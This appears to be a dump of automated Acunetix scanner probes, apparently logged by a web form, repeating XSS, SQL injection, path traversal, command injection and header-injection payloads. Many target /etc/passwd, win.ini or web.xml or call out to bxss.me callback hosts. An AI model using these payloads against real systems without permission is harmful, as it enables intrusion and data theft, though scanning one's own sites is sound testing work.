\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1<div style=width:expression(prompt(978338))>

1

&cat /etc/passwd&

1

1

1<iframe src='data:text/html

................windowswin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(925022)>

'&cat /etc/passwd&'

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(957269)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<img src=xyz OnErRor=prompt(998561)>

"&cat /etc/passwd&"

1

1

1<img/src=">" onerror=alert(992016)>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

cat /etc/passwd

1<ScRiPt%20>prompt(934687)</sCripT>

1

1

1

../../../../../../../../../../etc/passwd

1&lt

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

`cat /etc/passwd`

1

1

\xf6<img acu onmouseover=prompt(999225) //\xf6>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

1

../../../../../../../../../../etc/passwd.jpg

${99467+99630}

WEB-INF/web.xml

1<input autofocus onfocus=prompt(913740)>

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

'|'ld

<a href='http://www.acunetix.com'>website security</a>

WEB-INF\web.xml

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

[url=http://www.acunetix.com]website security[/url]

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1

1

1

1_nsw9c <ScRiPt >prompt(989922)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

testasp.vulnweb.com

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

1

1

1

1

1

1

1

1

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

1

||cat /etc/passwd

acu1026\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1026

1

1

/etc/passwd

1&n931464=v998629

)

acux2464\xc0\xbez1\xc0\xbcz2a\x90bcxuca2464

1

1

1

&dir

!(()&&!|*|*|

1

^(#$!@#$)(()))******

1

'&dir&'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<ScRiPt >prompt(951109)</ScRiPt>

1

1

1

'"()

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"&dir&"

1

1

'

1<script>prompt(987510)</script>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

|dir

"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<ScRiPt >prompt(938575)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}

1

1

http://hit0e18ekysGM.bxss.me/

acunetix_wvs_invalid_filename

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

'|dir

${@print(md5(acunetix_wvs_security_test))}\

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?938788></ScRiPt>

file:///etc/passwd

1

-1

1

comments

1<ScRiPt >prompt(954827)</ScRiPt>

1

1

1

1

1

1

comments

-1)

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1<video><source onerror="javascript:prompt(983027)">

1

1

-1))

1

1

comments/.

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(914526)"></g></svg>

1

1

1

8giZ32bN'

1

1

1<div style=width:expression(prompt(949239))>

1

1

1

9Y1sk3Hz')

1

WEB-INF\web.xml

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1<iframe src='data:text/html

1

'"

HcLbLMGr'))

1

1'"()&%<ScRiPt >prompt(970626)</ScRiPt>

1<body onload=prompt(996411)>

1

../../../../../../../../../../windows/win.ini

1

-1

<!--

1

1

-1)

'"()&%<ScRiPt >prompt(910385)</ScRiPt>

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(935995)>

1

1

../../../../../../../../../../boot.ini

1

response.write(9225571*9857627)

1

-1))

1

1

1_904378

1<img src=xyz OnErRor=prompt(958161)>

moBDXB9B'

1

../../../../../../../../../../windows/win.ini.jpg

1

'+response.write(9225571*9857627)+'

wR2VpOrC')

1

1

1<img/src=">" onerror=alert(910360)>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

85vDKq5X'))

"+response.write(9225571*9857627)+"

&cat /etc/passwd&

1

1<ScRiPt%20>prompt(915399)</sCripT>

1

................windowswin.ini

1

1

'&cat /etc/passwd&'

1

1&lt

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

\xf6<img acu onmouseover=prompt(968412) //\xf6>

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1<input autofocus onfocus=prompt(942279)>

SomeCustomInjectedHeader:injected_by_wvs

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

<a href='http://www.acunetix.com'>website security</a>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

`cat /etc/passwd`

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1_I0AWN <ScRiPt >prompt(985308)</ScRiPt>

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

'|'ld

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

${99407+99524}

1

WEB-INF/web.xml

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n943277=v960187

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

WEB-INF\web.xml

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1some_inexistent_file_with_long_name%00.jpg

1

1

1

1

1

'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

/etc/passwd

1

testasp.vulnweb.com

"

1

1

1

)

1

||cat /etc/passwd

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

!(()&&!|*|*|

1

1

^(#$!@#$)(()))******

1

&dir

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'"()

acu8030\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8030

1

1

1

'&dir&'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acux7912\xc0\xbez1\xc0\xbcz2a\x90bcxuca7912

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

1

1<ScRiPt >prompt(930305)</ScRiPt>

1

"

"&dir&"

acunetix_wvs_invalid_filename

http://hitE7M5euxcBQ.bxss.me/

1

1<script>prompt(916781)</script>

${@print(md5(acunetix_wvs_security_test))}

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

comments

1<ScRiPt >prompt(909526)</ScRiPt>

|dir

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

file:///etc/passwd

1

comments/.

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?931716></ScRiPt>

1

'|dir

-1

1

1

http://www.acunetix.tst

1

/\../\../\../\../\../\../\../etc/passwd

1

1<ScRiPt >prompt(925466)</ScRiPt>

'"

1

1

1

"|dir

1<video><source onerror="javascript:prompt(954904)">

WEB-INF/web.xml

<!--

1

1

1

1

-1)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(913018)"></g></svg>

1

1

1

1

WEB-INF\web.xml

1

1

-1))

1

1<div style=width:expression(prompt(932386))>

1

vr6KMfxP'

1

1

1'"()&%<ScRiPt >prompt(908601)</ScRiPt>

response.write(9422648*9169884)

1

../../../../../../../../../../windows/win.ini

1

1

3kAadznk')

1<iframe src='data:text/html

'+response.write(9422648*9169884)+'

1

1

'"()&%<ScRiPt >prompt(955662)</ScRiPt>

"+response.write(9422648*9169884)+"

1<body onload=prompt(991149)>

&cat /etc/passwd&

../../../../../../../../../../boot.ini

7InEVtJV'))

1_926949

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973378)>

1

-1

'&cat /etc/passwd&'

1

1<img src=xyz OnErRor=prompt(927193)>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../windows/win.ini.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

-1)

1<img/src=">" onerror=alert(971417)>

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt%20>prompt(987927)</sCripT>

-1))

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

1

................windowswin.ini

OMWxQIB0'

cat /etc/passwd

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

J7ZgAnO4')

\xf6<img acu onmouseover=prompt(954782) //\xf6>

`cat /etc/passwd`

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<input autofocus onfocus=prompt(947159)>

9RtdaWpE'))

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${100105+100126}

|cat /etc/passwd#

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

<a href='http://www.acunetix.com'>website security</a>

1

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

[url=http://www.acunetix.com]website security[/url]

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1_h4AVh <ScRiPt >prompt(989684)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

testasp.vulnweb.com

acu10304\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10304

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

acux2177\xc0\xbez1\xc0\xbcz2a\x90bcxuca2177

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

'

1<ScRiPt >prompt(956667)</ScRiPt>

1

1

1<script>prompt(981601)</script>

/etc/passwd

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

WEB-INF/web.xml

1<ScRiPt >prompt(947851)</ScRiPt>

"

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1&n998652=v912424

)

-1

WEB-INF\web.xml

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?961292></ScRiPt>

1

!(()&&!|*|*|

1

1

^(#$!@#$)(()))******

1<ScRiPt >prompt(977225)</ScRiPt>

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1<video><source onerror="javascript:prompt(936727)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

1

-1))

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989987)"></g></svg>

1

'"()

1

1

1

1

1<div style=width:expression(prompt(978839))>

HaffoksT'

'&dir&'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1<iframe src='data:text/html

i4SSKzEt')

"&dir&"

'

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

go4mh2Qg'))

1<body onload=prompt(906035)>

1

-1

1

"

1

|dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985720)>

1

1

-1)

acunetix_wvs_invalid_filename

file:///etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

'|dir

1

-1))

http://hitOF0XsRHJIo.bxss.me/

1

1<img src=xyz OnErRor=prompt(908165)>

${@print(md5(acunetix_wvs_security_test))}\

comments

KYhoaqMH'

"|dir

1<img/src=">" onerror=alert(993780)>

/\../\../\../\../\../\../\../etc/passwd

1

1

comments

1

1

1

1<ScRiPt%20>prompt(937668)</sCripT>

ROADHxFd')

1

1

WEB-INF/web.xml

comments/.

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1&lt

1

WEB-INF\web.xml

1

1

1

1

1

1

1

\xf6<img acu onmouseover=prompt(912250) //\xf6>

1

1

1

http://www.acunetix.tst

../../../../../../../../../../windows/win.ini

'"

gNx6gCzG'))

1

1<input autofocus onfocus=prompt(914441)>

1

1

../../../../../../../../../../boot.ini

1

<!--

1

1

response.write(9356424*9795925)

1'"()&%<ScRiPt >prompt(911264)</ScRiPt>

<a href='http://www.acunetix.com'>website security</a>

1

1

'+response.write(9356424*9795925)+'

../../../../../../../../../../windows/win.ini.jpg

1

[url=http://www.acunetix.com]website security[/url]

'"()&%<ScRiPt >prompt(904498)</ScRiPt>

1

1

1

1

"+response.write(9356424*9795925)+"

1

1_939502

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1_kNKPO <ScRiPt >prompt(942866)</ScRiPt>

1

1

1

&cat /etc/passwd&

1

................windowswin.ini

1

1

'&cat /etc/passwd&'

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

${99690+99703}

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

1

1&n976230=v942484

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

WEB-INF/web.xml

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

1

WEB-INF\web.xml

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

testasp.vulnweb.com

1

)

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

^(#$!@#$)(()))******

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

acu1907\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1907

1

1

1

1

1

1

"

1

acux5656\xc0\xbez1\xc0\xbcz2a\x90bcxuca5656

/etc/passwd

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

||cat /etc/passwd

1<ScRiPt >prompt(959491)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

1

1<script>prompt(905170)</script>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

&dir

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'

1

1<ScRiPt >prompt(977861)</ScRiPt>

1

'&dir&'

1

-1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936783></ScRiPt>

"

1

"&dir&"

http://hit7jF6aEq107.bxss.me/

-1)

1

1<ScRiPt >prompt(934654)</ScRiPt>

1

acunetix_wvs_invalid_filename

|dir

${@print(md5(acunetix_wvs_security_test))}

1

-1))

1

1<video><source onerror="javascript:prompt(936577)">

comments

1

1

${@print(md5(acunetix_wvs_security_test))}\

'|dir

1

9mtRkZnk'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(928169)"></g></svg>

1

comments

1

file:///etc/passwd

1

8tps42yL')

1

comments/.

1<div style=width:expression(prompt(989165))>

"|dir

1

1

aaAUzNGH'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1<iframe src='data:text/html

http://www.acunetix.tst

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'"

-1

1

1

1

1'"()&%<ScRiPt >prompt(985680)</ScRiPt>

1

1<body onload=prompt(911116)>

-1)

WEB-INF/web.xml

<!--

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(924962)>

1

1

'"()&%<ScRiPt >prompt(913104)</ScRiPt>

1

-1))

WEB-INF\web.xml

1

1<img src=xyz OnErRor=prompt(993180)>

1

1_995312

L7nrsOCK'

1

1

1

1<img/src=">" onerror=alert(985881)>

1

Likp88Up')

1

../../../../../../../../../../windows/win.ini

1

RM2oKrKt'))

1<ScRiPt%20>prompt(941796)</sCripT>

1

1

../../../../../../../../../../boot.ini

1

1&lt

1

../../../../../../../../../../windows/win.ini.jpg

1

\xf6<img acu onmouseover=prompt(907416) //\xf6>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<input autofocus onfocus=prompt(972066)>

1

<a href='http://www.acunetix.com'>website security</a>

1

................windowswin.ini

[url=http://www.acunetix.com]website security[/url]

1

1

1_rG6fW <ScRiPt >prompt(990036)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

1

1

1

1

1

1

acu7025\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7025

1

acux5007\xc0\xbez1\xc0\xbcz2a\x90bcxuca5007

1

1

1<ScRiPt >prompt(958073)</ScRiPt>

1

1<script>prompt(942537)</script>

1

1<ScRiPt >prompt(914722)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?927694></ScRiPt>

1

response.write(9630746*9349769)

1<ScRiPt >prompt(946892)</ScRiPt>

'+response.write(9630746*9349769)+'

1<video><source onerror="javascript:prompt(986356)">

"+response.write(9630746*9349769)+"

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(945076)"></g></svg>

1

1<div style=width:expression(prompt(940622))>

1

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

1<body onload=prompt(955831)>

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942014)>

1

1

1<img src=xyz OnErRor=prompt(958907)>

1

1

cat /etc/passwd

1

1

1

1

`cat /etc/passwd`

1

1<img/src=">" onerror=alert(964156)>

../../../../../../../../../../etc/passwd

1<ScRiPt%20>prompt(913181)</sCripT>

1

1

|cat /etc/passwd#

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

'|'ld

1

1

1

\xf6<img acu onmouseover=prompt(984146) //\xf6>

../../../../../../../../../../etc/passwd.jpg

1

1<input autofocus onfocus=prompt(960615)>

1

"|"ld

${100221+100354}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

<a href='http://www.acunetix.com'>website security</a>

1

1some_inexistent_file_with_long_name%00.jpg

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1_NKu9b <ScRiPt >prompt(950563)</ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'

1

testasp.vulnweb.com

1&n909991=v993938

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

||cat /etc/passwd

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

&dir

)

/etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

!(()&&!|*|*|

'&dir&'

-1

'

^(#$!@#$)(()))******

'"()

"

1

-1)

"&dir&"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

-1))

1

1

|dir

${@print(md5(acunetix_wvs_security_test))}\

1

rz1bL9rf'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

MlW5qCiu')

1

'|dir

1

1

1

1

http://hitCdSUVenqaf.bxss.me/

oUdCF7Lu'))

1

"|dir

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1

acunetix_wvs_invalid_filename

1

1

1

1

-1)

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1

comments

-1))

file:///etc/passwd

1

NoDnJbnZ'

'"

comments/.

1

1

1'"()&%<ScRiPt >prompt(979611)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

rxpgZ5AQ')

<!--

1

1

1

1

'"()&%<ScRiPt >prompt(901254)</ScRiPt>

1

WEB-INF/web.xml

eF2QhSZS'))

1

response.write(9276976*9987728)

1_965195

1

1

1

1

1

'+response.write(9276976*9987728)+'

1

&cat /etc/passwd&

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9276976*9987728)+"

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../windows/win.ini

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

../../../../../../../../../../boot.ini

1

1

1

1

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../../../../../../../../../../windows/win.ini.jpg

1

1

cat /etc/passwd

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

../../../../../../../../../../etc/passwd.jpg

${100256+99216}

1

1

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

................windowswin.ini

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

1

1&n920490=v927095

|cat /etc/passwd#

..\..\..\..\..\..\..\..\windows\win.ini

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

'|'ld

acu1785\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1785

testasp.vulnweb.com

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

acux8839\xc0\xbez1\xc0\xbcz2a\x90bcxuca8839

"|"ld

1

!(()&&!|*|*|

1<ScRiPt >prompt(968513)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

1

1<script>prompt(900802)</script>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

/etc/passwd

1

'

1

1

1

1<ScRiPt >prompt(905801)</ScRiPt>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?902249></ScRiPt>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

'"()

1

'

1<ScRiPt >prompt(929895)</ScRiPt>

1

WEB-INF/web.xml

1

||cat /etc/passwd

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<video><source onerror="javascript:prompt(900559)">

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

WEB-INF\web.xml

-1)

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919411)"></g></svg>

${@print(md5(acunetix_wvs_security_test))}

'&dir&'

1

-1))

${@print(md5(acunetix_wvs_security_test))}\

1<div style=width:expression(prompt(996239))>

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<iframe src='data:text/html

Nr95M3B3'

acunetix_wvs_invalid_filename

1

"&dir&"

1

http://hit7w4dW5oNor.bxss.me/

1

hMvYbDuX')

1

1<body onload=prompt(958308)>

comments

1

1

JYISmvcJ'))

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(900965)>

comments

-1

file:///etc/passwd

|dir

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments/.

-1)

1<img src=xyz OnErRor=prompt(921674)>

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

